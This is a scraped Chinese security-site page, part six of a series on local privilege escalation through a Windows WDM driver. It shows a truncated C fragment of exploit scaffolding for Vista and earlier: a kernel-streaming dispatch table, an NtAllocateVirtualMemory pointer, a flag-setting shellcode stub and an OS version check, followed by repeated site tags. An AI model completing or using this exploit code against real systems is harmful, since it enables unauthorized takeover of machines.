利用 WDM 驱动本地提权(6)_系统安全

                                    IN ULONG                ZeroBits,
                                    IN OUT PULONG           RegionSize,
                                    IN ULONG                AllocationType,
                                    IN ULONG                Protect );
typedef struct {
ULONG_PTR DeviceIoControl;
ULONG_PTR Read;
ULONG_PTR Write;
ULONG_PTR Flush;
ULONG_PTR Close;
ULONG_PTR QuerySecurity;
ULONG_PTR SetSecurity;
ULONG_PTR FastDeviceIoControl;
ULONG_PTR FastRead;
ULONG_PTR FastWrite;
} KSDISPATCH_TABLE, *PKSDISPATCH_TABLE;

    //// Native API
PNTALLOCATE        NtAllocateVirtualMemory;
BOOL FlagVulnerable = FALSE;
_declspec(naked) void ShellCode()
{
    _asm{
        mov FlagVulnerable,1

retn 0x8
    }
}
BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    return TRUE;
}
void CheckOS ( PDWORD lpOS )
{
    OSVERSIONINFOA strOs;
    strOs.dwOSVersionInfoSize = sizeof( OSVERSIONINFOA );
    if ( GetVersionExA( &strOs ) )
    {
        if (strOs.dwMajorVersion == 5)
        {
            switch( strOs.dwMinorVersion )
            {
                case 0:
                    *lpOS = OS_2K;
                    break;
                case 1:
                case 2:
                    *lpOS = OS_XP_2K3_VISTA;

                    break;
            }
        }
        else if (strOs.dwMajorVersion == 6)
        {
            *lpOS = OS_XP_2K3_VISTA;
        }
    }
}
int Callback_Overview()
{
    printf("\n");
    printf("=================================================    \n");
    printf("    Microsoft Windows Vista and earlier        \n");

热门标签

利用 WDM 驱动本地提权(6)

快速评论

搜索

热门标签

利用 WDM 驱动 本地提权(6)

快速评论

利用 WDM 驱动本地提权(6)